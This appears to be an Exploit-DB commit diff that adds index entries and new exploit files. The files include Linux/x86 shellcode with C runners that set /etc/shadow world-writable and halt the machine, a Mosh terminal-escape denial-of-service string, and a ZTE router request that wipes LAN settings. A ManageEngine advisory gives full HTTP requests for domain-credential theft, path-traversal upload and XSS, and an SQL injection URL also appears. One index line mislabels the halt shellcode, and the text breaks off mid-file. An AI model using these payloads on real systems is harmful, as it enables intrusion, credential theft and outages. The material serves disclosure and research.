DB: 2015-06-20

25 new exploits

files.csv

@@ -10656,7 +10656,7 @@ id,file,description,date,author,platform,type,port
 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0
 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
-11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
+11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
 11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
@@ -33631,6 +33631,17 @@ id,file,description,date,author,platform,type,port
 37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80
+37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection Vulnerability",2012-05-22,"Eyup CELIK",php,webapps,0
+37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service Vulnerability",2012-05-22,"Timo Juhani Lindfors",linux,dos,0
+37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 'index.php' Cross Site Scripting Vulnerability",2012-05-21,"Eyup CELIK",php,webapps,0
+37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0
+37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure Vulnerability",2012-05-23,"team ' and 1=1--",php,webapps,0
+37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Include Vulnerability",2012-05-23,AkaStep,php,webapps,0
+37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
+37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
+37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
+37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 Local File Disclosure Vulnerability",2012-05-23,L3b-r1'z,php,webapps,0
+37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
@@ -33655,10 +33666,24 @@ id,file,description,date,author,platform,type,port
 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
+37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
+37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
+37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (21 bytes) (2)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
 37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,rebel,linux,local,0
+37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
+37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure Vulnerability",2012-05-28,L3b-r1'z,php,webapps,0
+37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection Vulnerability",2012-05-29,dex,php,webapps,0
 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability",2015-06-16,"Jerold Hoong",php,webapps,0
 37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
+37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0
+37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 'Sajax.php' PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
+37321,platforms/php/webapps/37321.txt,"DynPage 1.0 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0
+37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0
+37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability",2015-06-19,Vulnerability-Lab,hardware,webapps,0
+37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
+37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
+37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0

platforms/hardware/webapps/37323.txt

@@ -0,0 +1,154 @@
+Document Title:
+===============
+ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1522
+
+
+Release Date:
+=============
+2015-06-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1522
+
+
+Common Vulnerability Scoring System:
+====================================
+6
+
+
+Product & Service Introduction:
+===============================
+ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1)
+
+(Copy of the Vendor Homepage:  http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-06-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+ZTE Corporation
+Product: ZTE ZXV10 W300 3.1.0c_DR0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.
+The security vulnerability allows remote attackers to block/shutedown or delete network settings and components.
+
+The LAN configuration post to /Forms/home_lan_1 and the page  /home_lan_1  that stores the configuration of the router.
+Attackers can request via GET method the /Forms/home_lan_1  path and the modem will delete all the LAN configurations automatically. 
+The problem is the GET method request with the /Forms/home_lan_1  path that deletes all the configurations. A hard reset is required 
+after successful exploitation of the issue.
+
+The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0.
+Exploitation of the security web vulnerability requires no privilege web-application user account and low user interaction (click link).
+Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services.
+
+Request Method(s):
+				[+] POST
+
+Vulnerable Module(s):
+				[+] Forms/
+
+Affected Module(s):
+				[+] home_lan_1
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click).
+For security demonstration or to reproduce follow the provided information and steps below to continue.
+
+--- PoC Session Logs [GET] ---
+13:18:35.526[0ms][total 0ms] 
+Status: pending[]
+GET http://192.168.1.1/Forms/home_lan_1 
+Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
+Request Headers:   
+Host[192.168.1.1]   
+User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0]   
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]   
+Accept-Language[en-US,en;q=0.5]   
+Accept-Encoding[gzip, deflate]
+X-Forwarded-For[8.8.8.8]
+Connection[keep-alive]
+Authorization[Basic YWRtaW46YWRtaW4=]
+
+Note: The victim with needs to click to perform only the GET method request with non expired session to execute!
+
+Reference(s):
+http://localhost/Forms/home_lan_1 
+
+
+Security Risk:
+==============
+The security risk of the remote vulnerability in the interface service is estimated as high. (CVSS 6.0)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+

platforms/lin_x86/shellcode/37285.txt

@@ -0,0 +1,31 @@
+Linux/x86 - chmod() 777 /etc/shadow & exit() - 33 bytes
+
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Concat : b3mb4m@gmail.com
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:    31 c0                    xor    %eax,%eax
+ 8048062:    50                       push   %eax
+ 8048063:    68 61 64 6f 77           push   $0x776f6461
+ 8048068:    68 63 2f 73 68           push   $0x68732f63
+ 804806d:    68 2f 2f 65 74           push   $0x74652f2f
+ 8048072:    b0 0f                    mov    $0xf,%al
+ 8048074:    89 e3                    mov    %esp,%ebx
+ 8048076:    66 b9 ff 01              mov    $0x1ff,%cx
+ 804807a:    cd 80                    int    $0x80
+ 804807c:    31 c0                    xor    %eax,%eax
+ 804807e:    40                       inc    %eax
+ 804807f:    cd 80                    int    $0x80
+
+#include <stdio.h>
+#include <string.h>
+
+char *shellcode =
+"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\xb0\x0f\x89\xe3\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
+
+int main(void){
+    fprintf(stdout,"Length: %d\n",strlen(shellcode));
+    (*(void(*)()) shellcode)();}

platforms/lin_x86/shellcode/37289.txt

@@ -0,0 +1,28 @@
+​​Linux/x86 - Shutdown(init 0) - 30 bytes
+
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+
+08048060 <.text>:
+8048060:    31 c0
+8048062:    50
+8048063:    68 68 61 6c 74           push   $0x746c6168
+8048068:    68 69 6e 2f 2f           push   $0x2f2f6e69
+804806d:    68 2f 2f 73 62           push   $0x62732f2f
+8048072:    89 e3
+8048074:    50
+8048075:    89 e2
+8048077:    53
+8048078:    89 e1
+804807a:    b0 0b                    ;execve //sbin//halt
+804807c:    cd 80                    syscall
+
+#include <stdio.h>
+#include <string.h>
+
+char *diebich =
+"\x31\xc0\x50\x68\x68\x61\x6c\x74\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x73\x62\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+int main(void){
+    fprintf(stdout,"Length: %d\n",strlen(diebich));
+    (*(void(*)()) diebich)();}

platforms/linux/dos/37306.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/53646/info
+
+Mosh is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the affected application to crash or to enter an endless loop, denying service to legitimate users. 
+
+echo -en "\e[2147483647L"
+echo -en "\e[2147483647M"
+echo -en "\e[2147483647@"
+echo -en "\e[2147483647P" 

platforms/multiple/webapps/37322.txt

@@ -0,0 +1,301 @@
+Document Title:
+===============
+ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1501
+
+
+Release Date:
+=============
+2015-06-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1501
+
+
+Common Vulnerability Scoring System:
+====================================
+6.9
+
+
+Product & Service Introduction:
+===============================
+SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and 
+contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on 
+internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of 
+low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk stuff (typically Active Directory 
+integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is 
+important to consider when evaluating the risk of the below vulnerabilities.
+
+(Copy of the Vendor Homepage: https://www.manageengine.com/products/support-center/ )
+
+
+Abstract Advisory Information:
+==============================
+An indepndent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-05-27:	Researcher Notification & Coordination (Alain Homewood)
+2015-06-19:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Manage Engine
+Product: SupportCenter Plus - Web Application 7.90
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1 Improper authentication disclosing password (Authenticated)
+Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessibly by Administrators. 
+This functionality allows a low privilege user to:
+1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory
+2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records)
+
+A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include:
+1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation).
+2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar.
+
+Pre-requisites and considerations include:
+ - In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup.
+ - In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this)
+ - It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn`t displayed on the internet accessible login)
+
+
+ 
+1.2 Directory traversal on file upload (Authenticated)
+Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). 
+This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories.
+
+Potential impacts of this vulnerability include:
+1.) Remote code execution ***
+2.) Denial of service
+3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc)
+
+*** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment:
+1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed
+2.) The uploaded directory always appends an additional directory (named after the user`s ID) which prevents deployment of a packaged or unpackaged WAR file (or similar)
+
+Despite the above limitations I cannot con conclusively determine that code execution is not possible.
+
+
+
+1.3 Reflected cross site scripting (Authenticated)
+Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus.
+
+Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do.
+Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector.
+
+Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp.
+Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp.
+All authenticated users are vulnerable to these attack vectors.
+
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The vulnerability can be exploited by remote attackers without user interaction. 
+For security demonstration or to reproduce follow the provided information and steps below.
+
+Manual steps to reproduce the vulnerability ...
+1.) Set up a Active Directory domain
+2.) Install SupportCenter Plus
+3.) Login as an administrator and add a Windows domain and associated credentials
+4.) Logout and login as a low privilege user (by default there is guest/guest account)
+5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions
+(e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code)
+
+
+Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user:
+http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
+http://[VULNERABLE]/ImportADUsers.do
+
+Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this:
+
+	POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1
+	Host: [VULNERABLE]
+	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+	Accept-Language: en-US,en;q=0.5
+	Accept-Encoding: gzip, deflate
+	X-Requested-With: XMLHttpRequest
+	Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+	Referer: http://[VULNERABLE]:9090/AdminHome.do
+	Content-Length: 181
+	Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144
+	Connection: keep-alive
+	Pragma: no-cache
+	Cache-Control: no-cache
+
+	name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description=
+
+Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this:
+
+	POST /ImportADUsers.do HTTP/1.1
+	Host: [VULNERABLE]
+	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+	Accept-Language: en-US,en;q=0.5
+	Accept-Encoding: gzip, deflate
+	Referer: http://[VULNERABLE]:9090/ImportADUsers.do
+	Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide
+	Connection: keep-alive
+	Content-Type: application/x-www-form-urlencoded
+	Content-Length: 193
+	
+	selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true
+
+
+
+1.2
+The vulnerability can be exploited by remote attackers without user interaction. 
+For security demonstration or to reproduce follow the provided information and steps below.
+
+Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request
+
+It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below:
+	String filePath1 = "Attachments" + filSep + module + filSep + userID1
+
+Note that an additional directory (named after the user's ID) is always appended to file path.
+
+In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2.
+
+The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment.
+
+
+An example POST request is shown below:
+	POST /workorder/Attachment.jsp?component=Request HTTP/1.1
+	Host: [VULNERABLE]:9090
+	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+	Accept-Language: en-US,en;q=0.5
+	Accept-Encoding: gzip, deflate
+	Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request
+	Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536
+	Connection: keep-alive
+	Content-Type: multipart/form-data; boundary=---------------------------17390486101970088239358532669
+	Content-Length: 1110
+
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="filePath"; filename="payload.html"
+	Content-Type: application/octet-stream
+
+	test12345
+
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="filename"
+
+	payload.html
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="vecPath"
+
+
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="vec"
+
+
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="theSubmit"
+
+	AttachFile
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="formName"
+
+	null
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="component"
+
+	../../../../../../../../../../../../
+	-----------------------------17390486101970088239358532669
+	Content-Disposition: form-data; name="ATTACH"
+
+	Attach
+	-----------------------------17390486101970088239358532669--
+
+
+	
+	
+1.3
+The cross site scripting web vulnerability can be exploited by remote attackers with low or medium user interaction. 
+For security demonstration or to reproduce follow the provided information and steps below.
+
+Administrator user only:
+http://[VULNERABLE]:9090/CustomReportHandler.do?module=run_query_editor_query&reportTitle=test&query=<BODY%20ONLOAD=alert(1)>
+
+Any authenticated user:
+http://[VULNERABLE]:9090/jsp/ResetADPwd.jsp?compAcct=%22%3E%3CIFRAME%20SRC=%22http://www.google.com%22%3E%3C/IFRAME%3E
+http://[VULNERABLE]:9090/jsp/CacheScreenWidth.jsp?width=1600&redirectTo=";alert(1);//
+
+
+Security Risk:
+==============
+1.1
+The security risk of the authentication disclosing password vulnerability is estimated as high. (CVSS 6.9)
+
+1.2
+The security risk of the directory traversal web vulnerability is estimated as high. (CVSS 5.9)
+
+1.3
+The security risk of the cross site scripting web vulnerabilities are estimated as medium. (CVSS 3.3)
+
+
+Credits & Authors:
+==================
+Alain Homewood (PwC New Zealand) - [http://vulnerability-lab.com/show.php?user=Alain%20Homewood]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+

platforms/php/webapps/37305.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53644/info
+
+Plogger Photo Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/demo/plog-rss.php?id=1%27%22&level=collection 

platforms/php/webapps/37307.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53648/info
+
+phAlbum is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
